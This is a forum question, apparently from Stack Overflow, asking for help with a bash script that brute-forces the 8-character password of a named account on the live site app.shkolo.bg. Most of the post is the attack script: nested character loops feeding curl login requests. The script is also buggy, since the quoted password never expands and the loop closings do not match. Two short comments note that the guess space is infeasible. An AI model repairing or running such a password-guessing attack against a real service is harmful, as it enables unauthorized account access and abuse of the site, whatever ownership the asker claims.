# Brute force my online account password using bash script

Tags: bash, shell, curl, passwords, brute-force

I will brute force password on account in https://app.shkolo.bg/ website, but i have difficulties with login in the website. My username is DonchoBonboncho and the password is 8-digits. My code look like this:

```
#!/bin/bash
```

curl --cookie-jar cjar --output /dev/null http://app.shkolo.bg/

```
    for a in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
            do for b in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
            do for c in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
            do for d in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
            do for e in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
            do for f in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
            do for g in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
            do for h in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!; 
            do
                    echo $a$b$c$d$e$f$g$h;

                    curl --cookie cjar --cookie-jar cjar \
                            --data 'username=DonchoBonboncho' \
                            --data 'password="$a$b$c$d$e$f$g$h"' \
                            --data 'form_id=user_login' \
                            --data 'op=Log in' \
                            --location \
                            --output ~/loginresult.html \
                                    http://app.shkolo.bg/
            done;
            done;
            done;
            done;
            done;
            done;
            done;

    done;
```

I'm not sure for website login and I need help for this.
It don't give me errors or wornings, but it surprisingly accepts (entering in the website) the first password and does not continue.

Comment: I guess you are looking for https://stackoverflow.com/questions/3846123/generating-permutations-using-bash :-)

Comment: 64⁸ = 281 474 976 710 656. No site will possibly agree to suffer that many login requests from you =) Try recalling at least some letters to shrink the permutation space.